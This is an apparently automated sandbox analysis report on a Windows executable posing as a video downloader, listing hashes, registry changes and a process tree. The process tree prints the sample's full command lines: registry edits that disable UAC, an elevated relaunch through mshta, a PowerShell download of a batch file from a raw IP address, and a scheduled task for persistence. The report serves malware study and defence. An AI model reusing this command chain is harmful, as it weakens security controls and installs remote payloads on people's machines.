Analysis
max time kernel: 122s
max time network: 122s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 12-06-2024 11:23
Static task: static1
Behavioral task: behavioral1
  Sample: pornhub_downloader.exe
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: pornhub_downloader.exe
  Resource: win10v2004-20240611-en
General
Target: pornhub_downloader.exe
Size: 88KB
MD5: 759f5a6e3daa4972d43bd4a5edbdeb11
SHA1: 36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256: 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512: f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
SSDEEP: 1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV
Malware Config
Signatures
UAC bypass
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | reg.exe
Command and Scripting Interpreter: PowerShell
  PID 860: powershell.exe
Sets file to hidden (1 TTPs, 1 IoCs)
Modifies file attributes to stop it showing in Explorer etc.
  PID 2576: attrib.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 1712: schtasks.exe
Modifies Internet Explorer settings
All keys below are under \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer
  description | ioc | Process
  Key created | \IETld\LowMic | iexplore.exe
  Key created | \IntelliForms | iexplore.exe
  Key created | \LowRegistry\DOMStorage | iexplore.exe
  Key created | \Toolbar | iexplore.exe
  Key created | \Recovery\AdminActive | iexplore.exe
  Set value (str) | \Main\WindowsSearch\Version = "WS not running" | iexplore.exe
  Set value (int) | \Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
  Key created | \TabbedBrowsing\NewTabPage | iexplore.exe
  Key created | \PageSetup | iexplore.exe
  Set value (int) | \Recovery\AdminActive\{44694951-28AE-11EF-B21B-FA9381F5F0AB} = "0" | iexplore.exe
  Key created | \DomainSuggestion | iexplore.exe
  Key created | \BrowserEmulation\LowMic | iexplore.exe
  Key created | \InternetRegistry | iexplore.exe
  Set value (int) | \Main\CompatibilityFlags = "0" | iexplore.exe
  Key created | \SearchScopes | iexplore.exe
  Set value (data) | \Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
  Set value (int) | \Recovery\PendingRecovery\AdminActive = "1" | iexplore.exe
  Set value (int) | \TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
  Key created | \Main | mshta.exe
  Key created | \Main | iexplore.exe
  Key created | \GPU | iexplore.exe
  Key created | \Main\WindowsSearch | iexplore.exe
  Set value (str) | \Main\FullScreen = "no" | iexplore.exe
  Key created | \Recovery\PendingRecovery | iexplore.exe
  Set value (data) | \TabbedBrowsing\NewTabPage\MFV = (value elided) | iexplore.exe
  Set value (int) | \DomainSuggestion\NextUpdateDate = "424353331" | iexplore.exe
  Key created | \LowRegistry | iexplore.exe
  Key created | \Toolbar\WebBrowser | iexplore.exe
  Key created | \Main | IEXPLORE.EXE
  Key created | \TabbedBrowsing | iexplore.exe
  Set value (data) | \TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000587104b0d2f7da409208cf3ae9e77a230000000002000000000010660000000100002000000097ae506894f6ee0a388dad475b0942312d64b0f1cdfc3c0df350862c41f7df45000000000e80000000020000200000000dc33f8877365ae14214b4886b80b97d82ed9353d1fc438f0dc96a2d864b9f302000000045c096954e7f8d9ab2a0d9ed0d6c473a6c77ddc43565edbf2b30a60521aff5e540000000158a43a8e68c7e0614844f1624232b0c147c2fd7b1565346130031f9dde29346af7400bcc7c77d9a0f332f1ddf05f5023d644245b7684796d9676b746cc9c27e | iexplore.exe
  Set value (data) | \TabbedBrowsing\NewTabPage\LastProcessed = 6007fc29bbbcda01 | iexplore.exe
  Key created | \LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
  Key created | \Zoom | iexplore.exe
  Set value (int) | \SearchScopes\DownloadRetries = "3" | iexplore.exe
Suspicious behavior: EnumeratesProcesses (1 IoCs)
  PID 860: powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Token: SeDebugPrivilege | PID 860: powershell.exe
Suspicious use of FindShellTrayWindow (1 IoCs)
  PID 2556: iexplore.exe
Suspicious use of SetWindowsHookEx (6 IoCs)
  PID 2556: iexplore.exe
  PID 2556: iexplore.exe
  PID 2728: IEXPLORE.EXE
  PID 2728: IEXPLORE.EXE
  PID 2728: IEXPLORE.EXE
  PID 2728: IEXPLORE.EXE
Suspicious use of WriteProcessMemory (55 IoCs)
  description | pid | Process | procid_target | occurrences
  PID 2468 wrote to memory of 1264 | 2468 | pornhub_downloader.exe | 28 | x4
  PID 1264 wrote to memory of 2744 | 1264 | cmd.exe | 30 | x3
  PID 2744 wrote to memory of 2360 | 2744 | mshta.exe | 31 | x4
  PID 2360 wrote to memory of 2760 | 2360 | PORNHU~1.EXE | 32 | x4
  PID 2760 wrote to memory of 2708 | 2760 | cmd.exe | 34 | x4
  PID 2760 wrote to memory of 2992 | 2760 | cmd.exe | 35 | x4
  PID 2760 wrote to memory of 2688 | 2760 | cmd.exe | 36 | x4
  PID 2760 wrote to memory of 2380 | 2760 | cmd.exe | 37 | x4
  PID 2380 wrote to memory of 2672 | 2380 | cmd.exe | 38 | x4
  PID 2760 wrote to memory of 2556 | 2760 | cmd.exe | 39 | x4
  PID 2760 wrote to memory of 2576 | 2760 | cmd.exe | 40 | x4
  PID 2760 wrote to memory of 860 | 2760 | cmd.exe | 41 | x4
  PID 2556 wrote to memory of 2728 | 2556 | iexplore.exe | 42 | x4
  PID 2760 wrote to memory of 1712 | 2760 | cmd.exe | 43 | x4
Views/modifies file attributes (1 TTPs, 1 IoCs)
  PID 2576: attrib.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"
    - Suspicious use of WriteProcessMemory
    PID: 2468
  [2] C:\Windows\system32\cmd.exe
      command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2175.tmp\2176.tmp\2177.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"
      - Suspicious use of WriteProcessMemory
      PID: 1264
    [3] C:\Windows\system32\mshta.exe
        command line: mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
        - Modifies Internet Explorer settings
        - Suspicious use of WriteProcessMemory
        PID: 2744
      [4] C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE
          command line: "C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target
          - Suspicious use of WriteProcessMemory
          PID: 2360
        [5] C:\Windows\SysWOW64\cmd.exe
            command line: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\229E.tmp\229F.tmp\22A0.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"
            - Suspicious use of WriteProcessMemory
            PID: 2760
          [6] C:\Windows\SysWOW64\reg.exe
              command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
              - UAC bypass
              PID: 2708
          [6] C:\Windows\SysWOW64\reg.exe
              command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
              - UAC bypass
              PID: 2992
          [6] C:\Windows\SysWOW64\reg.exe
              command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
              - UAC bypass
              PID: 2688
          [6] C:\Windows\SysWOW64\cmd.exe
              command line: C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
              - Suspicious use of WriteProcessMemory
              PID: 2380
            [7] C:\Windows\SysWOW64\reg.exe
                command line: reg query HKEY_CLASSES_ROOT\http\shell\open\command
                PID: 2672
          [6] C:\Program Files\Internet Explorer\iexplore.exe
              command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://www.pornhub.com/
              - Modifies Internet Explorer settings
              - Suspicious use of FindShellTrayWindow
              - Suspicious use of SetWindowsHookEx
              - Suspicious use of WriteProcessMemory
              PID: 2556
            [7] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:275457 /prefetch:2
                - Modifies Internet Explorer settings
                - Suspicious use of SetWindowsHookEx
                PID: 2728
          [6] C:\Windows\SysWOW64\attrib.exe
              command line: attrib +s +h d:\net
              - Sets file to hidden
              - Views/modifies file attributes
              PID: 2576
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              command line: powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              PID: 860
          [6] C:\Windows\SysWOW64\schtasks.exe
              command line: SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
              - Creates scheduled task(s)
              PID: 1712
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Scheduled Task/Job (1)
Downloads
Filesize: 1KB
MD5: 9856d2fe29a28c54c5943c2150f7bae1
SHA1: f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97
SHA256: 0b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999
SHA512: 002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f